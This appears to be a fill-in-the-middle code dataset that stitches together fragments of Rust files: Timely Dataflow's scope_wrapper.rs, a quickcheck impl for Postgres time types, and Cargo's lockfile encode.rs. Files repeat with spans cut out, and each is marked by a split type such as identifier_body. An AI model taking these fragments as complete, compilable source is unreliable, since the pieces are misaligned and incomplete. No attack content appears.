assert!(summary.len() as u64 == inputs);
assert!(!summary.iter().any(|x| x.len() as u64!= outputs));
let mut result = ScopeWrapper {
name: format!("{}[{}]", scope.name(), index),
scope: Some(scope),
index: index,
inputs: inputs,
outputs: outputs,
edges: vec![Default::default(); outputs as usize],
notify: notify,
summary: summary,
guarantees: vec![Default::default(); inputs as usize],
capabilities: vec![Default::default(); outputs as usize],
outstanding_messages: vec![Default::default(); inputs as usize],
internal_progress: vec![CountMap::new(); outputs as usize],
consumed_messages: vec![CountMap::new(); inputs as usize],
produced_messages: vec![CountMap::new(); outputs as usize],
guarantee_changes: vec![CountMap::new(); inputs as usize],
};
// TODO : Gross. Fix.
for (index, capability) in result.capabilities.iter_mut().enumerate() {
capability.update_iter_and(work[index].elements().iter().map(|x|x.clone()), |_, _| {});
}
return result;
}
pub fn set_external_summary(&mut self, summaries: Vec<Vec<Antichain<T::Summary>>>, frontier: &mut [CountMap<T>]) {
self.scope.as_mut().map(|scope| scope.set_external_summary(summaries, frontier));
}
pub fn push_pointstamps(&mut self, external_progress: &[CountMap<T>]) {
assert!(self.scope.is_some() || external_progress.iter().all(|x| x.len() == 0));
if self.notify && external_progress.iter().any(|x| x.len() > 0) {
for input_port in (0..self.inputs as usize) {
self.guarantees[input_port]
.update_into_cm(&external_progress[input_port], &mut self.guarantee_changes[input_port]);
}
// push any changes to the frontier to the subgraph.
if self.guarantee_changes.iter().any(|x| x.len() > 0) {
let changes = &mut self.guarantee_changes;
self.scope.as_mut().map(|scope| scope.push_external_progress(changes));
// TODO : Shouldn't be necessary
// for change in self.guarantee_changes.iter_mut() { change.clear(); }
debug_assert!(!changes.iter().any(|x| x.len() > 0));
}
}
}
pub fn pull_pointstamps<A: FnMut(u64,T,i64)->()>(&mut self,
pointstamp_messages: &mut CountMap<(u64, u64, T)>,
pointstamp_internal: &mut CountMap<(u64, u64, T)>,
mut output_action: A) -> bool {
let active = {
if let &mut Some(ref mut scope) = &mut self.scope {
scope.pull_internal_progress(&mut self.internal_progress,
&mut self.consumed_messages,
&mut self.produced_messages)
}
else { false }
};
// shutting down if nothing left to do
if self.scope.is_some() &&
!active &&
self.notify && // we don't track guarantees and capabilities for non-notify scopes. bug?
self.guarantees.iter().all(|guarantee| guarantee.empty()) &&
self.capabilities.iter().all(|capability| capability.empty()) {
// println!("Shutting down {}", self.name);
self.scope = None;
self.name = format!("{}(tombstone)", self.name);
}
// for each output: produced messages and internal progress
for output in (0..self.outputs as usize) {
while let Some((time, delta)) = self.produced_messages[output].pop() {
for &target in self.edges[output].iter() {
match target {
ScopeInput(tgt, tgt_in) => { pointstamp_messages.update(&(tgt, tgt_in, time), delta); },
GraphOutput(graph_output) => { output_action(graph_output, time, delta); },
}
}
}
while let Some((time, delta)) = self.internal_progress[output as usize].pop() {
pointstamp_internal.update(&(self.index, output as u64, time), delta);
}
}
// for each input: consumed messages
for input in (0..self.inputs as usize) {
while let Some((time, delta)) = self.consumed_messages[input as usize].pop() {
pointstamp_messages.update(&(self.index, input as u64, time), -delta);
}
}
return active;
}
pub fn add_edge(&mut self, output: u64, target: Target) { self.edges[output as usize].push(target); }
|
pub fn name(&self) -> String { self.name.clone() }
}
|
random_line_split
|
|
scope_wrapper.rs
|
use std::default::Default;
use communication::Communicator;
use progress::frontier::{MutableAntichain, Antichain};
use progress::{Timestamp, Scope};
use progress::nested::Target;
use progress::nested::subgraph::Target::{GraphOutput, ScopeInput};
use progress::count_map::CountMap;
pub struct ScopeWrapper<T: Timestamp> {
pub name: String,
pub scope: Option<Box<Scope<T>>>, // the scope itself
index: u64,
pub inputs: u64, // cached information about inputs
pub outputs: u64, // cached information about outputs
pub edges: Vec<Vec<Target>>,
pub notify: bool,
pub summary: Vec<Vec<Antichain<T::Summary>>>, // internal path summaries (input x output)
pub guarantees: Vec<MutableAntichain<T>>, // per-input: guarantee made by parent scope in inputs
pub capabilities: Vec<MutableAntichain<T>>, // per-output: capabilities retained by scope on outputs
pub outstanding_messages: Vec<MutableAntichain<T>>, // per-input: counts of messages on each input
internal_progress: Vec<CountMap<T>>, // per-output: temp buffer used to ask about internal progress
consumed_messages: Vec<CountMap<T>>, // per-input: temp buffer used to ask about consumed messages
produced_messages: Vec<CountMap<T>>, // per-output: temp buffer used to ask about produced messages
pub guarantee_changes: Vec<CountMap<T>>, // per-input: temp storage for changes in some guarantee...
}
impl<T: Timestamp> ScopeWrapper<T> {
pub fn
|
(mut scope: Box<Scope<T>>, index: u64, _path: String) -> ScopeWrapper<T> {
let inputs = scope.inputs();
let outputs = scope.outputs();
let notify = scope.notify_me();
let (summary, work) = scope.get_internal_summary();
assert!(summary.len() as u64 == inputs);
assert!(!summary.iter().any(|x| x.len() as u64!= outputs));
let mut result = ScopeWrapper {
name: format!("{}[{}]", scope.name(), index),
scope: Some(scope),
index: index,
inputs: inputs,
outputs: outputs,
edges: vec![Default::default(); outputs as usize],
notify: notify,
summary: summary,
guarantees: vec![Default::default(); inputs as usize],
capabilities: vec![Default::default(); outputs as usize],
outstanding_messages: vec![Default::default(); inputs as usize],
internal_progress: vec![CountMap::new(); outputs as usize],
consumed_messages: vec![CountMap::new(); inputs as usize],
produced_messages: vec![CountMap::new(); outputs as usize],
guarantee_changes: vec![CountMap::new(); inputs as usize],
};
// TODO : Gross. Fix.
for (index, capability) in result.capabilities.iter_mut().enumerate() {
capability.update_iter_and(work[index].elements().iter().map(|x|x.clone()), |_, _| {});
}
return result;
}
pub fn set_external_summary(&mut self, summaries: Vec<Vec<Antichain<T::Summary>>>, frontier: &mut [CountMap<T>]) {
self.scope.as_mut().map(|scope| scope.set_external_summary(summaries, frontier));
}
pub fn push_pointstamps(&mut self, external_progress: &[CountMap<T>]) {
assert!(self.scope.is_some() || external_progress.iter().all(|x| x.len() == 0));
if self.notify && external_progress.iter().any(|x| x.len() > 0) {
for input_port in (0..self.inputs as usize) {
self.guarantees[input_port]
.update_into_cm(&external_progress[input_port], &mut self.guarantee_changes[input_port]);
}
// push any changes to the frontier to the subgraph.
if self.guarantee_changes.iter().any(|x| x.len() > 0) {
let changes = &mut self.guarantee_changes;
self.scope.as_mut().map(|scope| scope.push_external_progress(changes));
// TODO : Shouldn't be necessary
// for change in self.guarantee_changes.iter_mut() { change.clear(); }
debug_assert!(!changes.iter().any(|x| x.len() > 0));
}
}
}
pub fn pull_pointstamps<A: FnMut(u64,T,i64)->()>(&mut self,
pointstamp_messages: &mut CountMap<(u64, u64, T)>,
pointstamp_internal: &mut CountMap<(u64, u64, T)>,
mut output_action: A) -> bool {
let active = {
if let &mut Some(ref mut scope) = &mut self.scope {
scope.pull_internal_progress(&mut self.internal_progress,
&mut self.consumed_messages,
&mut self.produced_messages)
}
else { false }
};
// shutting down if nothing left to do
if self.scope.is_some() &&
!active &&
self.notify && // we don't track guarantees and capabilities for non-notify scopes. bug?
self.guarantees.iter().all(|guarantee| guarantee.empty()) &&
self.capabilities.iter().all(|capability| capability.empty()) {
// println!("Shutting down {}", self.name);
self.scope = None;
self.name = format!("{}(tombstone)", self.name);
}
// for each output: produced messages and internal progress
for output in (0..self.outputs as usize) {
while let Some((time, delta)) = self.produced_messages[output].pop() {
for &target in self.edges[output].iter() {
match target {
ScopeInput(tgt, tgt_in) => { pointstamp_messages.update(&(tgt, tgt_in, time), delta); },
GraphOutput(graph_output) => { output_action(graph_output, time, delta); },
}
}
}
while let Some((time, delta)) = self.internal_progress[output as usize].pop() {
pointstamp_internal.update(&(self.index, output as u64, time), delta);
}
}
// for each input: consumed messages
for input in (0..self.inputs as usize) {
while let Some((time, delta)) = self.consumed_messages[input as usize].pop() {
pointstamp_messages.update(&(self.index, input as u64, time), -delta);
}
}
return active;
}
pub fn add_edge(&mut self, output: u64, target: Target) { self.edges[output as usize].push(target); }
pub fn name(&self) -> String { self.name.clone() }
}
|
new
|
identifier_name
|
scope_wrapper.rs
|
use std::default::Default;
use communication::Communicator;
use progress::frontier::{MutableAntichain, Antichain};
use progress::{Timestamp, Scope};
use progress::nested::Target;
use progress::nested::subgraph::Target::{GraphOutput, ScopeInput};
use progress::count_map::CountMap;
pub struct ScopeWrapper<T: Timestamp> {
pub name: String,
pub scope: Option<Box<Scope<T>>>, // the scope itself
index: u64,
pub inputs: u64, // cached information about inputs
pub outputs: u64, // cached information about outputs
pub edges: Vec<Vec<Target>>,
pub notify: bool,
pub summary: Vec<Vec<Antichain<T::Summary>>>, // internal path summaries (input x output)
pub guarantees: Vec<MutableAntichain<T>>, // per-input: guarantee made by parent scope in inputs
pub capabilities: Vec<MutableAntichain<T>>, // per-output: capabilities retained by scope on outputs
pub outstanding_messages: Vec<MutableAntichain<T>>, // per-input: counts of messages on each input
internal_progress: Vec<CountMap<T>>, // per-output: temp buffer used to ask about internal progress
consumed_messages: Vec<CountMap<T>>, // per-input: temp buffer used to ask about consumed messages
produced_messages: Vec<CountMap<T>>, // per-output: temp buffer used to ask about produced messages
pub guarantee_changes: Vec<CountMap<T>>, // per-input: temp storage for changes in some guarantee...
}
impl<T: Timestamp> ScopeWrapper<T> {
pub fn new(mut scope: Box<Scope<T>>, index: u64, _path: String) -> ScopeWrapper<T> {
let inputs = scope.inputs();
let outputs = scope.outputs();
let notify = scope.notify_me();
let (summary, work) = scope.get_internal_summary();
assert!(summary.len() as u64 == inputs);
assert!(!summary.iter().any(|x| x.len() as u64!= outputs));
let mut result = ScopeWrapper {
name: format!("{}[{}]", scope.name(), index),
scope: Some(scope),
index: index,
inputs: inputs,
outputs: outputs,
edges: vec![Default::default(); outputs as usize],
notify: notify,
summary: summary,
guarantees: vec![Default::default(); inputs as usize],
capabilities: vec![Default::default(); outputs as usize],
outstanding_messages: vec![Default::default(); inputs as usize],
internal_progress: vec![CountMap::new(); outputs as usize],
consumed_messages: vec![CountMap::new(); inputs as usize],
produced_messages: vec![CountMap::new(); outputs as usize],
guarantee_changes: vec![CountMap::new(); inputs as usize],
};
// TODO : Gross. Fix.
for (index, capability) in result.capabilities.iter_mut().enumerate() {
capability.update_iter_and(work[index].elements().iter().map(|x|x.clone()), |_, _| {});
}
return result;
}
pub fn set_external_summary(&mut self, summaries: Vec<Vec<Antichain<T::Summary>>>, frontier: &mut [CountMap<T>]) {
self.scope.as_mut().map(|scope| scope.set_external_summary(summaries, frontier));
}
pub fn push_pointstamps(&mut self, external_progress: &[CountMap<T>])
|
}
pub fn pull_pointstamps<A: FnMut(u64,T,i64)->()>(&mut self,
pointstamp_messages: &mut CountMap<(u64, u64, T)>,
pointstamp_internal: &mut CountMap<(u64, u64, T)>,
mut output_action: A) -> bool {
let active = {
if let &mut Some(ref mut scope) = &mut self.scope {
scope.pull_internal_progress(&mut self.internal_progress,
&mut self.consumed_messages,
&mut self.produced_messages)
}
else { false }
};
// shutting down if nothing left to do
if self.scope.is_some() &&
!active &&
self.notify && // we don't track guarantees and capabilities for non-notify scopes. bug?
self.guarantees.iter().all(|guarantee| guarantee.empty()) &&
self.capabilities.iter().all(|capability| capability.empty()) {
// println!("Shutting down {}", self.name);
self.scope = None;
self.name = format!("{}(tombstone)", self.name);
}
// for each output: produced messages and internal progress
for output in (0..self.outputs as usize) {
while let Some((time, delta)) = self.produced_messages[output].pop() {
for &target in self.edges[output].iter() {
match target {
ScopeInput(tgt, tgt_in) => { pointstamp_messages.update(&(tgt, tgt_in, time), delta); },
GraphOutput(graph_output) => { output_action(graph_output, time, delta); },
}
}
}
while let Some((time, delta)) = self.internal_progress[output as usize].pop() {
pointstamp_internal.update(&(self.index, output as u64, time), delta);
}
}
// for each input: consumed messages
for input in (0..self.inputs as usize) {
while let Some((time, delta)) = self.consumed_messages[input as usize].pop() {
pointstamp_messages.update(&(self.index, input as u64, time), -delta);
}
}
return active;
}
pub fn add_edge(&mut self, output: u64, target: Target) { self.edges[output as usize].push(target); }
pub fn name(&self) -> String { self.name.clone() }
}
|
{
assert!(self.scope.is_some() || external_progress.iter().all(|x| x.len() == 0));
if self.notify && external_progress.iter().any(|x| x.len() > 0) {
for input_port in (0..self.inputs as usize) {
self.guarantees[input_port]
.update_into_cm(&external_progress[input_port], &mut self.guarantee_changes[input_port]);
}
// push any changes to the frontier to the subgraph.
if self.guarantee_changes.iter().any(|x| x.len() > 0) {
let changes = &mut self.guarantee_changes;
self.scope.as_mut().map(|scope| scope.push_external_progress(changes));
// TODO : Shouldn't be necessary
// for change in self.guarantee_changes.iter_mut() { change.clear(); }
debug_assert!(!changes.iter().any(|x| x.len() > 0));
}
}
|
identifier_body
|
scope_wrapper.rs
|
use std::default::Default;
use communication::Communicator;
use progress::frontier::{MutableAntichain, Antichain};
use progress::{Timestamp, Scope};
use progress::nested::Target;
use progress::nested::subgraph::Target::{GraphOutput, ScopeInput};
use progress::count_map::CountMap;
pub struct ScopeWrapper<T: Timestamp> {
pub name: String,
pub scope: Option<Box<Scope<T>>>, // the scope itself
index: u64,
pub inputs: u64, // cached information about inputs
pub outputs: u64, // cached information about outputs
pub edges: Vec<Vec<Target>>,
pub notify: bool,
pub summary: Vec<Vec<Antichain<T::Summary>>>, // internal path summaries (input x output)
pub guarantees: Vec<MutableAntichain<T>>, // per-input: guarantee made by parent scope in inputs
pub capabilities: Vec<MutableAntichain<T>>, // per-output: capabilities retained by scope on outputs
pub outstanding_messages: Vec<MutableAntichain<T>>, // per-input: counts of messages on each input
internal_progress: Vec<CountMap<T>>, // per-output: temp buffer used to ask about internal progress
consumed_messages: Vec<CountMap<T>>, // per-input: temp buffer used to ask about consumed messages
produced_messages: Vec<CountMap<T>>, // per-output: temp buffer used to ask about produced messages
pub guarantee_changes: Vec<CountMap<T>>, // per-input: temp storage for changes in some guarantee...
}
impl<T: Timestamp> ScopeWrapper<T> {
pub fn new(mut scope: Box<Scope<T>>, index: u64, _path: String) -> ScopeWrapper<T> {
let inputs = scope.inputs();
let outputs = scope.outputs();
let notify = scope.notify_me();
let (summary, work) = scope.get_internal_summary();
assert!(summary.len() as u64 == inputs);
assert!(!summary.iter().any(|x| x.len() as u64!= outputs));
let mut result = ScopeWrapper {
name: format!("{}[{}]", scope.name(), index),
scope: Some(scope),
index: index,
inputs: inputs,
outputs: outputs,
edges: vec![Default::default(); outputs as usize],
notify: notify,
summary: summary,
guarantees: vec![Default::default(); inputs as usize],
capabilities: vec![Default::default(); outputs as usize],
outstanding_messages: vec![Default::default(); inputs as usize],
internal_progress: vec![CountMap::new(); outputs as usize],
consumed_messages: vec![CountMap::new(); inputs as usize],
produced_messages: vec![CountMap::new(); outputs as usize],
guarantee_changes: vec![CountMap::new(); inputs as usize],
};
// TODO : Gross. Fix.
for (index, capability) in result.capabilities.iter_mut().enumerate() {
capability.update_iter_and(work[index].elements().iter().map(|x|x.clone()), |_, _| {});
}
return result;
}
pub fn set_external_summary(&mut self, summaries: Vec<Vec<Antichain<T::Summary>>>, frontier: &mut [CountMap<T>]) {
self.scope.as_mut().map(|scope| scope.set_external_summary(summaries, frontier));
}
pub fn push_pointstamps(&mut self, external_progress: &[CountMap<T>]) {
assert!(self.scope.is_some() || external_progress.iter().all(|x| x.len() == 0));
if self.notify && external_progress.iter().any(|x| x.len() > 0) {
for input_port in (0..self.inputs as usize) {
self.guarantees[input_port]
.update_into_cm(&external_progress[input_port], &mut self.guarantee_changes[input_port]);
}
// push any changes to the frontier to the subgraph.
if self.guarantee_changes.iter().any(|x| x.len() > 0) {
let changes = &mut self.guarantee_changes;
self.scope.as_mut().map(|scope| scope.push_external_progress(changes));
// TODO : Shouldn't be necessary
// for change in self.guarantee_changes.iter_mut() { change.clear(); }
debug_assert!(!changes.iter().any(|x| x.len() > 0));
}
}
}
pub fn pull_pointstamps<A: FnMut(u64,T,i64)->()>(&mut self,
pointstamp_messages: &mut CountMap<(u64, u64, T)>,
pointstamp_internal: &mut CountMap<(u64, u64, T)>,
mut output_action: A) -> bool {
let active = {
if let &mut Some(ref mut scope) = &mut self.scope
|
else { false }
};
// shutting down if nothing left to do
if self.scope.is_some() &&
!active &&
self.notify && // we don't track guarantees and capabilities for non-notify scopes. bug?
self.guarantees.iter().all(|guarantee| guarantee.empty()) &&
self.capabilities.iter().all(|capability| capability.empty()) {
// println!("Shutting down {}", self.name);
self.scope = None;
self.name = format!("{}(tombstone)", self.name);
}
// for each output: produced messages and internal progress
for output in (0..self.outputs as usize) {
while let Some((time, delta)) = self.produced_messages[output].pop() {
for &target in self.edges[output].iter() {
match target {
ScopeInput(tgt, tgt_in) => { pointstamp_messages.update(&(tgt, tgt_in, time), delta); },
GraphOutput(graph_output) => { output_action(graph_output, time, delta); },
}
}
}
while let Some((time, delta)) = self.internal_progress[output as usize].pop() {
pointstamp_internal.update(&(self.index, output as u64, time), delta);
}
}
// for each input: consumed messages
for input in (0..self.inputs as usize) {
while let Some((time, delta)) = self.consumed_messages[input as usize].pop() {
pointstamp_messages.update(&(self.index, input as u64, time), -delta);
}
}
return active;
}
pub fn add_edge(&mut self, output: u64, target: Target) { self.edges[output as usize].push(target); }
pub fn name(&self) -> String { self.name.clone() }
}
|
{
scope.pull_internal_progress(&mut self.internal_progress,
&mut self.consumed_messages,
&mut self.produced_messages)
}
|
conditional_block
|
quickcheck_impls.rs
|
extern crate quickcheck;
use self::quickcheck::{Arbitrary, Gen};
use super::{PgDate, PgTime, PgTimestamp, PgInterval};
impl Arbitrary for PgDate {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgDate(i32::arbitrary(g))
}
}
impl Arbitrary for PgTime {
fn arbitrary<G: Gen>(g: &mut G) -> Self
|
}
impl Arbitrary for PgTimestamp {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgTimestamp(i64::arbitrary(g))
}
}
impl Arbitrary for PgInterval {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgInterval {
microseconds: i64::arbitrary(g),
days: i32::arbitrary(g),
months: i32::arbitrary(g),
}
}
}
|
{
let mut time = -1;
while time < 0 {
time = i64::arbitrary(g);
}
PgTime(time)
}
|
identifier_body
|
quickcheck_impls.rs
|
extern crate quickcheck;
use self::quickcheck::{Arbitrary, Gen};
use super::{PgDate, PgTime, PgTimestamp, PgInterval};
|
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgDate(i32::arbitrary(g))
}
}
impl Arbitrary for PgTime {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
let mut time = -1;
while time < 0 {
time = i64::arbitrary(g);
}
PgTime(time)
}
}
impl Arbitrary for PgTimestamp {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgTimestamp(i64::arbitrary(g))
}
}
impl Arbitrary for PgInterval {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgInterval {
microseconds: i64::arbitrary(g),
days: i32::arbitrary(g),
months: i32::arbitrary(g),
}
}
}
|
impl Arbitrary for PgDate {
|
random_line_split
|
quickcheck_impls.rs
|
extern crate quickcheck;
use self::quickcheck::{Arbitrary, Gen};
use super::{PgDate, PgTime, PgTimestamp, PgInterval};
impl Arbitrary for PgDate {
fn
|
<G: Gen>(g: &mut G) -> Self {
PgDate(i32::arbitrary(g))
}
}
impl Arbitrary for PgTime {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
let mut time = -1;
while time < 0 {
time = i64::arbitrary(g);
}
PgTime(time)
}
}
impl Arbitrary for PgTimestamp {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgTimestamp(i64::arbitrary(g))
}
}
impl Arbitrary for PgInterval {
fn arbitrary<G: Gen>(g: &mut G) -> Self {
PgInterval {
microseconds: i64::arbitrary(g),
days: i32::arbitrary(g),
months: i32::arbitrary(g),
}
}
}
|
arbitrary
|
identifier_name
|
encode.rs
|
use std::collections::{HashMap, BTreeMap};
use regex::Regex;
use rustc_serialize::{Encodable, Encoder, Decodable, Decoder};
use core::{Package, PackageId, SourceId, Workspace};
use util::{CargoResult, Graph, Config};
use super::Resolve;
#[derive(RustcEncodable, RustcDecodable, Debug)]
pub struct EncodableResolve {
package: Option<Vec<EncodableDependency>>,
root: EncodableDependency,
metadata: Option<Metadata>,
}
pub type Metadata = BTreeMap<String, String>;
impl EncodableResolve {
pub fn to_resolve(&self, ws: &Workspace) -> CargoResult<Resolve> {
let path_deps = build_path_deps(ws);
let default = try!(ws.current()).package_id().source_id();
let mut g = Graph::new();
let mut tmp = HashMap::new();
let mut replacements = HashMap::new();
let packages = Vec::new();
let packages = self.package.as_ref().unwrap_or(&packages);
let id2pkgid = |id: &EncodablePackageId| {
to_package_id(&id.name, &id.version, id.source.as_ref(),
default, &path_deps)
};
let dep2pkgid = |dep: &EncodableDependency| {
to_package_id(&dep.name, &dep.version, dep.source.as_ref(),
default, &path_deps)
};
let root = try!(dep2pkgid(&self.root));
let ids = try!(packages.iter().map(&dep2pkgid)
.collect::<CargoResult<Vec<_>>>());
{
let mut register_pkg = |pkgid: &PackageId| {
let precise = pkgid.source_id().precise()
.map(|s| s.to_string());
assert!(tmp.insert(pkgid.clone(), precise).is_none(),
"a package was referenced twice in the lockfile");
g.add(pkgid.clone(), &[]);
};
register_pkg(&root);
for id in ids.iter() {
register_pkg(id);
}
}
{
let mut add_dependencies = |id: &PackageId, pkg: &EncodableDependency|
-> CargoResult<()> {
if let Some(ref replace) = pkg.replace {
let replace = try!(id2pkgid(replace));
let replace_precise = tmp.get(&replace).map(|p| {
replace.with_precise(p.clone())
}).unwrap_or(replace);
replacements.insert(id.clone(), replace_precise);
assert!(pkg.dependencies.is_none());
return Ok(())
}
let deps = match pkg.dependencies {
Some(ref deps) => deps,
None => return Ok(()),
};
for edge in deps.iter() {
let to_depend_on = try!(id2pkgid(edge));
let precise_pkgid =
tmp.get(&to_depend_on)
.map(|p| to_depend_on.with_precise(p.clone()))
.unwrap_or(to_depend_on.clone());
g.link(id.clone(), precise_pkgid);
}
Ok(())
};
try!(add_dependencies(&root, &self.root));
for (id, pkg) in ids.iter().zip(packages) {
try!(add_dependencies(id, pkg));
}
}
Ok(Resolve {
graph: g,
root: root,
features: HashMap::new(),
metadata: self.metadata.clone(),
replacements: replacements,
})
}
}
fn build_path_deps(ws: &Workspace) -> HashMap<String, SourceId> {
// If a crate is *not* a path source, then we're probably in a situation
// such as `cargo install` with a lock file from a remote dependency. In
// that case we don't need to fixup any path dependencies (as they're not
// actually path dependencies any more), so we ignore them.
let members = ws.members().filter(|p| {
p.package_id().source_id().is_path()
}).collect::<Vec<_>>();
let mut ret = HashMap::new();
for member in members.iter() {
ret.insert(member.package_id().name().to_string(),
member.package_id().source_id().clone());
}
for member in members.iter() {
build(member, ws.config(), &mut ret);
}
return ret;
fn build(pkg: &Package,
config: &Config,
ret: &mut HashMap<String, SourceId>) {
let deps = pkg.dependencies()
.iter()
.filter(|d|!ret.contains_key(d.name()))
.map(|d| d.source_id())
.filter(|id| id.is_path())
.filter_map(|id| id.url().to_file_path().ok())
.map(|path| path.join("Cargo.toml"))
.filter_map(|path| Package::for_path(&path, config).ok())
.collect::<Vec<_>>();
for pkg in deps {
ret.insert(pkg.name().to_string(),
pkg.package_id().source_id().clone());
build(&pkg, config, ret);
}
}
}
fn to_package_id(name: &str,
version: &str,
source: Option<&SourceId>,
default_source: &SourceId,
path_sources: &HashMap<String, SourceId>)
-> CargoResult<PackageId> {
let source = source.or(path_sources.get(name)).unwrap_or(default_source);
PackageId::new(name, version, source)
}
#[derive(RustcEncodable, RustcDecodable, Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodableDependency {
name: String,
version: String,
source: Option<SourceId>,
dependencies: Option<Vec<EncodablePackageId>>,
replace: Option<EncodablePackageId>,
}
#[derive(Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodablePackageId {
name: String,
version: String,
source: Option<SourceId>
}
impl Encodable for EncodablePackageId {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut out = format!("{} {}", self.name, self.version);
if let Some(ref s) = self.source {
out.push_str(&format!(" ({})", s.to_url()));
}
out.encode(s)
}
}
impl Decodable for EncodablePackageId {
fn decode<D: Decoder>(d: &mut D) -> Result<EncodablePackageId, D::Error> {
let string: String = try!(Decodable::decode(d));
let regex = Regex::new(r"^([^ ]+) ([^ ]+)(?: \(([^\)]+)\))?$").unwrap();
let captures = regex.captures(&string)
.expect("invalid serialized PackageId");
let name = captures.at(1).unwrap();
let version = captures.at(2).unwrap();
let source = captures.at(3);
let source_id = source.map(|s| SourceId::from_url(s));
Ok(EncodablePackageId {
name: name.to_string(),
version: version.to_string(),
source: source_id
})
}
}
impl Encodable for Resolve {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut ids: Vec<&PackageId> = self.graph.iter().collect();
ids.sort();
let encodable = ids.iter().filter_map(|&id| {
if self.root == *id { return None; }
Some(encodable_resolve_node(id, self))
}).collect::<Vec<EncodableDependency>>();
EncodableResolve {
package: Some(encodable),
root: encodable_resolve_node(&self.root, self),
metadata: self.metadata.clone(),
}.encode(s)
}
}
fn encodable_resolve_node(id: &PackageId, resolve: &Resolve)
-> EncodableDependency {
let (replace, deps) = match resolve.replacement(id) {
Some(id) => {
(Some(encodable_package_id(id)), None)
}
None => {
let mut deps = resolve.graph.edges(id)
.into_iter().flat_map(|a| a)
.map(encodable_package_id)
.collect::<Vec<_>>();
deps.sort();
(None, Some(deps))
}
};
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().clone())
};
EncodableDependency {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
dependencies: deps,
replace: replace,
}
}
|
Some(id.source_id().with_precise(None))
};
EncodablePackageId {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
}
}
|
fn encodable_package_id(id: &PackageId) -> EncodablePackageId {
let source = if id.source_id().is_path() {
None
} else {
|
random_line_split
|
encode.rs
|
use std::collections::{HashMap, BTreeMap};
use regex::Regex;
use rustc_serialize::{Encodable, Encoder, Decodable, Decoder};
use core::{Package, PackageId, SourceId, Workspace};
use util::{CargoResult, Graph, Config};
use super::Resolve;
#[derive(RustcEncodable, RustcDecodable, Debug)]
pub struct EncodableResolve {
package: Option<Vec<EncodableDependency>>,
root: EncodableDependency,
metadata: Option<Metadata>,
}
pub type Metadata = BTreeMap<String, String>;
impl EncodableResolve {
pub fn to_resolve(&self, ws: &Workspace) -> CargoResult<Resolve> {
let path_deps = build_path_deps(ws);
let default = try!(ws.current()).package_id().source_id();
let mut g = Graph::new();
let mut tmp = HashMap::new();
let mut replacements = HashMap::new();
let packages = Vec::new();
let packages = self.package.as_ref().unwrap_or(&packages);
let id2pkgid = |id: &EncodablePackageId| {
to_package_id(&id.name, &id.version, id.source.as_ref(),
default, &path_deps)
};
let dep2pkgid = |dep: &EncodableDependency| {
to_package_id(&dep.name, &dep.version, dep.source.as_ref(),
default, &path_deps)
};
let root = try!(dep2pkgid(&self.root));
let ids = try!(packages.iter().map(&dep2pkgid)
.collect::<CargoResult<Vec<_>>>());
{
let mut register_pkg = |pkgid: &PackageId| {
let precise = pkgid.source_id().precise()
.map(|s| s.to_string());
assert!(tmp.insert(pkgid.clone(), precise).is_none(),
"a package was referenced twice in the lockfile");
g.add(pkgid.clone(), &[]);
};
register_pkg(&root);
for id in ids.iter() {
register_pkg(id);
}
}
{
let mut add_dependencies = |id: &PackageId, pkg: &EncodableDependency|
-> CargoResult<()> {
if let Some(ref replace) = pkg.replace {
let replace = try!(id2pkgid(replace));
let replace_precise = tmp.get(&replace).map(|p| {
replace.with_precise(p.clone())
}).unwrap_or(replace);
replacements.insert(id.clone(), replace_precise);
assert!(pkg.dependencies.is_none());
return Ok(())
}
let deps = match pkg.dependencies {
Some(ref deps) => deps,
None => return Ok(()),
};
for edge in deps.iter() {
let to_depend_on = try!(id2pkgid(edge));
let precise_pkgid =
tmp.get(&to_depend_on)
.map(|p| to_depend_on.with_precise(p.clone()))
.unwrap_or(to_depend_on.clone());
g.link(id.clone(), precise_pkgid);
}
Ok(())
};
try!(add_dependencies(&root, &self.root));
for (id, pkg) in ids.iter().zip(packages) {
try!(add_dependencies(id, pkg));
}
}
Ok(Resolve {
graph: g,
root: root,
features: HashMap::new(),
metadata: self.metadata.clone(),
replacements: replacements,
})
}
}
fn build_path_deps(ws: &Workspace) -> HashMap<String, SourceId> {
// If a crate is *not* a path source, then we're probably in a situation
// such as `cargo install` with a lock file from a remote dependency. In
// that case we don't need to fixup any path dependencies (as they're not
// actually path dependencies any more), so we ignore them.
let members = ws.members().filter(|p| {
p.package_id().source_id().is_path()
}).collect::<Vec<_>>();
let mut ret = HashMap::new();
for member in members.iter() {
ret.insert(member.package_id().name().to_string(),
member.package_id().source_id().clone());
}
for member in members.iter() {
build(member, ws.config(), &mut ret);
}
return ret;
fn build(pkg: &Package,
config: &Config,
ret: &mut HashMap<String, SourceId>) {
let deps = pkg.dependencies()
.iter()
.filter(|d|!ret.contains_key(d.name()))
.map(|d| d.source_id())
.filter(|id| id.is_path())
.filter_map(|id| id.url().to_file_path().ok())
.map(|path| path.join("Cargo.toml"))
.filter_map(|path| Package::for_path(&path, config).ok())
.collect::<Vec<_>>();
for pkg in deps {
ret.insert(pkg.name().to_string(),
pkg.package_id().source_id().clone());
build(&pkg, config, ret);
}
}
}
fn to_package_id(name: &str,
version: &str,
source: Option<&SourceId>,
default_source: &SourceId,
path_sources: &HashMap<String, SourceId>)
-> CargoResult<PackageId> {
let source = source.or(path_sources.get(name)).unwrap_or(default_source);
PackageId::new(name, version, source)
}
#[derive(RustcEncodable, RustcDecodable, Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodableDependency {
name: String,
version: String,
source: Option<SourceId>,
dependencies: Option<Vec<EncodablePackageId>>,
replace: Option<EncodablePackageId>,
}
#[derive(Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodablePackageId {
name: String,
version: String,
